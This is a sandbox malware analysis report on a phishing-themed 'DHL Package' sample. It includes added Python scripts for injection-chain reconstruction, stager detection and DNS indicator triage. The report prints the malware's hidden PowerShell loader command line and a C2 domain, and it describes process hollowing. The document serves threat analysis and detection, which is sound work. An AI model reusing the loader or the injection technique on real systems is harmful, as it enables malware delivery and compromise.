Malware Analysis Report

2025-08-11 02:16

Sample ID 240610-qp1nsaxbrc
Target 10062024_1326_09062024_DHL Package.zip
SHA256 dd7243dc57f78c2a9d515760aed44ff332a281f7e06c37f1b95887cff94a94a8
Tags
execution
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

dd7243dc57f78c2a9d515760aed44ff332a281f7e06c37f1b95887cff94a94a8

Threat Level: Likely malicious

The file 10062024_1326_09062024_DHL Package.zip was found to be: Likely malicious.

Malicious Activity Summary

execution

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in Program Files directory

Enumerates physical storage devices

Program crash

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Enterprise Matrix V15

Tactic | Technique
Execution | T1059.001 Command and Scripting Interpreter: PowerShell

Only the PowerShell signature carries an ATT&CK mapping in this report (the "execution" tag on it and on the sample); the remaining signatures are behavioural heuristics with no technique ID attached.

Analysis: static1

Detonation Overview

Reported

2024-06-10 13:26

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-10 13:26

Reported

2024-06-10 13:30

Platform

win7-20240508-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\DHL Package.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Loads dropped DLL

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Indfrysningers.exe | N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Indfrysningers.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 2992 set thread context of 2336 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\Indfrysningers.exe

Drops file in Program Files directory

Description | Indicator | Process | Target
File opened for modification | C:\Program Files (x86)\Common Files\firbens\psycholeptic.ini | C:\Users\Admin\AppData\Local\Temp\DHL Package.exe | N/A
File opened for modification | C:\Program Files (x86)\Common Files\boltholes.obl | C:\Users\Admin\AppData\Local\Temp\DHL Package.exe | N/A

Enumerates physical storage devices

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target | Rows
PID 2420 wrote to memory of 2992 | N/A | C:\Users\Admin\AppData\Local\Temp\DHL Package.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | 4
PID 2992 wrote to memory of 2560 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe | 4
PID 2992 wrote to memory of 2336 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\Indfrysningers.exe | 6

Identical rows are collapsed; the last column is the number of times each write was logged. Each child received four parent writes around its creation (powershell.exe from DHL Package.exe, cmd.exe from powershell.exe), so that count on its own is not evidence of injection. Indfrysningers.exe (PID 2336) received six writes from powershell.exe, and the same source also set its thread context (SetThreadContext table above). WriteProcessMemory followed by SetThreadContext into a freshly created process is the sequence associated with process hollowing or thread hijacking, and the memory/2336-22 dump listed under Files covers the region that would hold the injected image.
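The three tables above describe one process graph. As an added example (not part of the sandbox report), the following Python rebuilds that graph from the rows, collapses the repeated lines into counts, and flags which parent/child pair shows the write-then-set-thread-context sequence. The event strings and the PID-to-name map are copied from the tables; the baseline heuristic (a pair is suspicious only if it exceeds the per-child write count seen for ordinary process creation and also appears in the SetThreadContext table) is the author's own, not the sandbox's scoring logic.

```python
"""Rebuild the injection chain from WriteProcessMemory / SetThreadContext rows.

Added example, not part of the sandbox report. The event lines are the
Description column of the behavioral1 tables on this page, the PID-to-name
map comes from their Process/Target columns, and the hollowing heuristic is
the author's own, not the sandbox's scoring logic.
"""
import re
from collections import Counter

# Constructed from the report: one line per table row, in report order.
WRITE_EVENTS = (
    "PID 2420 wrote to memory of 2992\n" * 4
    + "PID 2992 wrote to memory of 2560\n" * 4
    + "PID 2992 wrote to memory of 2336\n" * 6
)
CONTEXT_EVENTS = "PID 2992 set thread context of 2336\n"

# Taken from the Process / Target columns of the same tables.
PROCESS_NAMES = {
    2420: "DHL Package.exe",
    2992: "powershell.exe",
    2560: "cmd.exe",
    2336: "Indfrysningers.exe",
}

WRITE_RE = re.compile(r"PID (\d+) wrote to memory of (\d+)")
CONTEXT_RE = re.compile(r"PID (\d+) set thread context of (\d+)")


def parse_pairs(text, pattern):
    """Count (source_pid, target_pid) edges for every line matching pattern."""
    pairs = Counter()
    for line in text.splitlines():
        m = pattern.search(line)
        if m:
            pairs[(int(m.group(1)), int(m.group(2)))] += 1
    return pairs


def summarize(write_pairs):
    """Collapse repeated rows into (src, dst, count) tuples, sorted by PID."""
    return sorted((src, dst, n) for (src, dst), n in write_pairs.items())


def hollowing_candidates(write_pairs, context_pairs):
    """Pairs that look like injection rather than plain process creation.

    Every child in the report received a baseline number of parent writes at
    creation (the minimum count across pairs, 4 here). A pair is flagged only
    when it exceeds that baseline AND the same source set the target's thread
    context: the WriteProcessMemory + SetThreadContext sequence typical of
    process hollowing / thread hijacking. Either condition alone is ignored.
    """
    if not write_pairs:
        return []
    baseline = min(write_pairs.values())
    return sorted(
        pair for pair, n in write_pairs.items()
        if n > baseline and pair in context_pairs
    )


def chain(write_pairs, root):
    """Walk write edges from root, breadth-first, returning the PIDs reached."""
    edges = {}
    for src, dst in write_pairs:
        edges.setdefault(src, []).append(dst)
    seen, queue, order = {root}, [root], []
    while queue:
        pid = queue.pop(0)
        order.append(pid)
        for child in sorted(edges.get(pid, [])):
            if child not in seen:
                seen.add(child)
                queue.append(child)
    return order


def render(pids):
    """Human-readable 'name(pid) -> name(pid)' string for a PID sequence."""
    return " -> ".join(f"{PROCESS_NAMES.get(p, '?')}({p})" for p in pids)


if __name__ == "__main__":
    writes = parse_pairs(WRITE_EVENTS, WRITE_RE)
    contexts = parse_pairs(CONTEXT_EVENTS, CONTEXT_RE)
    for src, dst, n in summarize(writes):
        print(f"{render([src])} wrote to {render([dst])} x{n}")
    print("process tree by memory writes:", render(chain(writes, 2420)))
    for pair in hollowing_candidates(writes, contexts):
        print("hollowing candidate:", render(pair))
```

Run stand-alone it prints the collapsed write table, the tree DHL Package.exe(2420) -> powershell.exe(2992) -> Indfrysningers.exe(2336) / cmd.exe(2560), and a single hollowing candidate, powershell.exe(2992) -> Indfrysningers.exe(2336). The same functions work on any sandbox export that phrases events this way; only PROCESS_NAMES is specific to this report.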

Processes

C:\Users\Admin\AppData\Local\Temp\DHL Package.exe

"C:\Users\Admin\AppData\Local\Temp\DHL Package.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -windowstyle hidden "$Uropfrer=Get-Content 'C:\Users\Admin\AppData\Local\Bridgebuilding\oralizes\indart\Mouthers\Afgiftsregler.del';$Skoleudgavers=$Uropfrer.SubString(54521,3);.$Skoleudgavers($Uropfrer)"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"

(In cmd.exe the caret is the escape character, so ^^ is a literal ^ and set /A evaluates the bitwise XOR 1^0, which is 1. Nothing visible in the report consumes that value; the child process exists only to evaluate the expression and exit.)

C:\Users\Admin\AppData\Local\Temp\Indfrysningers.exe

"C:\Users\Admin\AppData\Local\Temp\Indfrysningers.exe"

Network

Country | Destination | Domain | Proto | Queries
US | 8.8.8.8:53 | sa.columbrara.za.com | udp | 6

Six identical UDP lookups of the same name were sent to 8.8.8.8 within the 150 s window. The report records no follow-on TCP connection, so either the name did not resolve in the sandbox or the payload's traffic fell outside the capture. sa.columbrara.za.com is the only forward DNS lookup seen in either run and the report's only network indicator.

Files

memory/2992-8-0x0000000073691000-0x0000000073692000-memory.dmp

memory/2992-9-0x0000000073690000-0x0000000073C3B000-memory.dmp

memory/2992-11-0x0000000073690000-0x0000000073C3B000-memory.dmp

memory/2992-12-0x0000000073690000-0x0000000073C3B000-memory.dmp

memory/2992-10-0x0000000073690000-0x0000000073C3B000-memory.dmp

C:\Users\Admin\AppData\Local\Bridgebuilding\oralizes\indart\Mouthers\Afgiftsregler.del

MD5 b1bf3757ba661c2fc29713ddaa598605
SHA1 5c77e7e505aa16a208499b1a67089bcdba3d349b
SHA256 c8a6d8bb0a194f855387ef00c86f0016c1ba489eb7b6dc729af5853157d418c9
SHA512 06a766ab5d297082781db399571d458202bdf155ad1415de5bc453753b640dfba5c9c47047e0aefd964bc6b31a7161e50723a67db4c93276bc35c01412c1d40a

C:\Users\Admin\AppData\Local\Bridgebuilding\oralizes\indart\Mouthers\Timianernes.Vel

MD5 77c2017d3aab930e712847c30d7d5764
SHA1 f27a330028667e527305448d0a94913e3282c821
SHA256 9691d68779acccfebf0288f52c0becadf1aa9616c78eefa4c3cab657af0d9cee
SHA512 b8d15d0ed28792a921fbdb18b3d4017b1a76ae2f37cb4bc009b5517c050cdaba864e11549652036c88d56fbb31a4997343c64c7abb4265de82b86a7b848aa44a

memory/2992-16-0x0000000006410000-0x000000000BF8E000-memory.dmp

\Users\Admin\AppData\Local\Temp\Indfrysningers.exe

MD5 057849d89c720ddae62b9006fd7587f9
SHA1 66c5732d79b3514e7e98ac01a25b3362f82b5eed
SHA256 dd838e0ad2d227d581a04b9968609c1cf78f8570bcc36fe7abf176ec36d2b5e5
SHA512 f169462b72e8cf5263b79a8796ab95c2a3d144022e7d34efb911bf5d4cb1c23cb319a060b8688214c183d4fc906cd42f61756b62bbd4e872acf153d104031b90

memory/2992-21-0x0000000073690000-0x0000000073C3B000-memory.dmp

memory/2336-22-0x0000000000460000-0x00000000014C2000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-10 13:26

Reported

2024-06-10 13:29

Platform

win10v2004-20240426-en

Max time kernel

92s

Max time network

95s

Command Line

"C:\Users\Admin\AppData\Local\Temp\DHL Package.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Drops file in Program Files directory

Description | Indicator | Process | Target
File opened for modification | C:\Program Files (x86)\Common Files\firbens\psycholeptic.ini | C:\Users\Admin\AppData\Local\Temp\DHL Package.exe | N/A
File opened for modification | C:\Program Files (x86)\Common Files\boltholes.obl | C:\Users\Admin\AppData\Local\Temp\DHL Package.exe | N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Users\Admin\AppData\Local\Temp\DHL Package.exe

"C:\Users\Admin\AppData\Local\Temp\DHL Package.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -windowstyle hidden "$Uropfrer=Get-Content 'C:\Users\Admin\AppData\Local\Bridgebuilding\oralizes\indart\Mouthers\Afgiftsregler.del';$Skoleudgavers=$Uropfrer.SubString(54521,3);.$Skoleudgavers($Uropfrer)"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2188 -ip 2188

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 2556

The two WerFault.exe instances are Windows Error Reporting handling a crash of PID 2188 (the -p argument); every memory dump under Files for this run belongs to that same PID. On this Windows 10 image the chain ends there: no Indfrysningers.exe process, no SetThreadContext or WriteProcessMemory events, and no forward DNS lookup for sa.columbrara.za.com were recorded. That is why this run carries fewer signatures than behavioral1 and why "Program crash" appears in the summary.
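The powershell.exe command line, recorded identically in behavioral1 and behavioral2, is a small stager: it reads the dropped Afgiftsregler.del file into a variable, carves three characters out of it at offset 54521, and uses them as a command name through the dot-source operator (`.$cmd($blob)`), so the whole file becomes the argument of whatever command those three characters spell. The following Python is an added example, not anything from the report: it matches that pattern in process-creation logs (accepting Get-Content and its gc, cat and type aliases), pulls out the path and offset, and emulates the SubString carve against a constructed stand-in for the file. The real Afgiftsregler.del is not on this page, so the "iex" placed at the offset in SAMPLE_BLOB is sample data chosen to show the mechanics, not a statement about the actual file's contents. Get-Content without -Raw returns one string per line, so this loader depends on the blob being a single line; the helper refuses multi-line input instead of indexing into the wrong line.

```python
"""Detect and decode the 'Get-Content blob; $cmd = $blob.SubString(off, 3);
.$cmd($blob)' PowerShell stager seen in this report's process list.

Added example, not from the report. The regular expression, the carve helper
and SAMPLE_BLOB are the author's; SAMPLE_CMDLINE is the command line recorded
in behavioral1 and behavioral2. The real Afgiftsregler.del is not on this
page, so SAMPLE_BLOB is constructed and the 'iex' at the offset is a
placeholder showing the mechanics, not a claim about the actual file.
"""
import re

STAGER_PATTERN = (
    r"\$(?P<var>\w+)\s*=\s*(?:Get-Content|gc|cat|type)\s+'(?P<path>[^']+)'"  # blob read into $var
    r".*?\$(?P<cmdvar>\w+)\s*=\s*\$(?P=var)\.SubString\((?P<off>\d+)\s*,\s*(?P<len>\d+)\)"  # command name carved out
    r".*?\.\$(?P=cmdvar)\(\$(?P=var)\)"  # dot-invoke: .$cmd($blob)
)
STAGER_RE = re.compile(STAGER_PATTERN, re.IGNORECASE | re.DOTALL)

# The command line exactly as the report records it.
SAMPLE_CMDLINE = (
    r'"powershell.exe" -windowstyle hidden "$Uropfrer=Get-Content '
    r"'C:\Users\Admin\AppData\Local\Bridgebuilding\oralizes\indart\Mouthers\Afgiftsregler.del';"
    r'$Skoleudgavers=$Uropfrer.SubString(54521,3);.$Skoleudgavers($Uropfrer)"'
)

# Constructed stand-in for the ~55 KB .del file: filler with a 3-char slot at 54521.
SAMPLE_BLOB = "A" * 54521 + "iex" + "B" * 512


def parse_stager(cmdline):
    """Return blob path and the (offset, length) of the carved command, or None."""
    m = STAGER_RE.search(cmdline)
    if not m:
        return None
    return {
        "path": m.group("path"),
        "offset": int(m.group("off")),
        "length": int(m.group("len")),
        "hidden_window": "-windowstyle hidden" in cmdline.lower(),
    }


def carve_command(blob, offset, length):
    """Emulate $blob.SubString(offset, length) on the file content.

    Get-Content without -Raw yields one string per line, so the loader only
    works on a single-line file; a multi-line blob is rejected rather than
    silently indexed, and an out-of-range offset raises like .NET would.
    """
    if "\n" in blob:
        raise ValueError("blob has several lines; Get-Content would return an array, not one string")
    if offset + length > len(blob):
        raise ValueError(f"offset {offset} + {length} is past the end of a {len(blob)}-char blob")
    return blob[offset : offset + length]


def triage(cmdline, blob):
    """One shot: what would the dot-invoke actually run against this blob?"""
    info = parse_stager(cmdline)
    if info is None:
        return None
    cmd = carve_command(blob, info["offset"], info["length"])
    info["command"] = cmd
    info["invokes_expression"] = cmd.lower() in {"iex", "invoke-expression"}
    return info


if __name__ == "__main__":
    result = triage(SAMPLE_CMDLINE, SAMPLE_BLOB)
    print(f"blob: {result['path']}")
    print(f"carve: SubString({result['offset']}, {result['length']}) -> {result['command']!r}")
    print(f"runs blob through Invoke-Expression: {result['invokes_expression']}")
```

Feed STAGER_RE the CommandLine field of Sysmon event 1 or Windows 4688 records; a hit gives the path of the blob to collect from the host and the offset to inspect before running anything. If the carved command is iex, the rest of the file is PowerShell source and can be read directly without executing it.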

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp
US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp
US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp
US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp
US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 97.90.14.23.in-addr.arpa | udp
US | 8.8.8.8:53 | 112.90.14.23.in-addr.arpa | udp
US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp

Every entry is a reverse (PTR) lookup of an IP address, not the forward resolution of a domain; the addresses queried are 8.8.8.8, 20.49.150.241, 23.14.90.82, 192.229.221.95, 13.85.23.86, 20.242.39.171, 23.14.90.97, 23.14.90.112 and 52.111.243.31. in-addr.arpa names are not domain indicators and should not be blocklisted as such. This run produced no forward lookup at all, consistent with the PowerShell stage crashing before any payload ran.
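The two Network tables look alike but mean different things: behavioral1 holds repeated forward lookups of one name, behavioral2 only reverse (PTR) lookups of IP addresses. As an added example (not from the report), the Python below parses both row sets, converts in-addr.arpa names back to the addresses they describe, collapses repeats into counts, and keeps only forward-resolved names as candidate domain indicators, so PTR names are never blocklisted as if they were attacker domains. The rows are copied from the tables; the parsing and classification are the author's.

```python
"""Separate forward DNS lookups from reverse (PTR) lookups in the Network
tables and collapse repeats into counts.

Added example, not part of the report. The two row sets are copied from the
behavioral1 and behavioral2 Network tables; everything else is the author's.
"""
import ipaddress
from collections import Counter

# behavioral1: the same forward lookup logged six times.
BEHAVIORAL1_DNS = "US 8.8.8.8:53 sa.columbrara.za.com udp\n" * 6

# behavioral2: reverse lookups only.
BEHAVIORAL2_DNS = """\
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 97.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 112.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
"""


def parse_rows(text):
    """Yield (country, resolver, name, proto) for each 'Country Destination Domain Proto' row."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4:
            yield tuple(parts)


def ptr_to_ip(name):
    """'241.150.49.20.in-addr.arpa' -> '20.49.150.241'; None unless a full IPv4 PTR name."""
    suffix = ".in-addr.arpa"
    if not name.lower().endswith(suffix):
        return None
    octets = name[: -len(suffix)].split(".")
    if len(octets) != 4:
        return None  # zone-level or partial PTR names do not name a single host
    candidate = ".".join(reversed(octets))
    try:
        return str(ipaddress.IPv4Address(candidate))
    except ValueError:
        return None  # e.g. an octet above 255


def classify(text):
    """Return (forward_names, reverse_ips, resolvers) as Counters of query counts."""
    forward, reverse, resolvers = Counter(), Counter(), Counter()
    for _country, resolver, name, _proto in parse_rows(text):
        resolvers[resolver] += 1
        ip = ptr_to_ip(name)
        if ip:
            reverse[ip] += 1
        else:
            forward[name.lower().rstrip(".")] += 1
    return forward, reverse, resolvers


def candidate_domain_iocs(text):
    """Forward-resolved names only; PTR names are never domain indicators."""
    forward, _reverse, _resolvers = classify(text)
    return sorted(forward)


if __name__ == "__main__":
    for label, rows in (("behavioral1", BEHAVIORAL1_DNS), ("behavioral2", BEHAVIORAL2_DNS)):
        forward, reverse, resolvers = classify(rows)
        print(f"{label}: forward={dict(forward)} reverse={dict(reverse)} resolvers={dict(resolvers)}")
        print(f"{label}: domain IOCs -> {candidate_domain_iocs(rows)}")
```

For behavioral1 the only candidate domain IOC is sa.columbrara.za.com (6 queries); for behavioral2 the list is empty and the nine addresses come out as hosts that were reverse-looked-up, which is the right shape for a further enrichment step rather than for a block rule.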

Files

memory/2188-6-0x0000000073E7E000-0x0000000073E7F000-memory.dmp

memory/2188-7-0x0000000004540000-0x0000000004576000-memory.dmp

memory/2188-8-0x0000000004CA0000-0x00000000052C8000-memory.dmp

memory/2188-9-0x0000000073E70000-0x0000000074620000-memory.dmp

memory/2188-10-0x0000000073E70000-0x0000000074620000-memory.dmp

memory/2188-11-0x0000000004C50000-0x0000000004C72000-memory.dmp

memory/2188-12-0x0000000005440000-0x00000000054A6000-memory.dmp

memory/2188-13-0x00000000054B0000-0x0000000005516000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k2juaha0.dzb.ps1 (written by PowerShell itself at startup to probe the AppLocker/WDAC script policy; a host artifact of the PowerShell process, not a file dropped by the sample)

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2188-23-0x0000000005620000-0x0000000005974000-memory.dmp

memory/2188-24-0x0000000005B30000-0x0000000005B4E000-memory.dmp

memory/2188-25-0x0000000005B60000-0x0000000005BAC000-memory.dmp

memory/2188-26-0x0000000006B00000-0x0000000006B96000-memory.dmp

memory/2188-27-0x0000000006030000-0x000000000604A000-memory.dmp

memory/2188-28-0x0000000006080000-0x00000000060A2000-memory.dmp

memory/2188-29-0x0000000007150000-0x00000000076F4000-memory.dmp

C:\Users\Admin\AppData\Local\Bridgebuilding\oralizes\indart\Mouthers\Afgiftsregler.del

MD5 b1bf3757ba661c2fc29713ddaa598605
SHA1 5c77e7e505aa16a208499b1a67089bcdba3d349b
SHA256 c8a6d8bb0a194f855387ef00c86f0016c1ba489eb7b6dc729af5853157d418c9
SHA512 06a766ab5d297082781db399571d458202bdf155ad1415de5bc453753b640dfba5c9c47047e0aefd964bc6b31a7161e50723a67db4c93276bc35c01412c1d40a

memory/2188-31-0x0000000007D80000-0x00000000083FA000-memory.dmp

memory/2188-33-0x0000000073E70000-0x0000000074620000-memory.dmp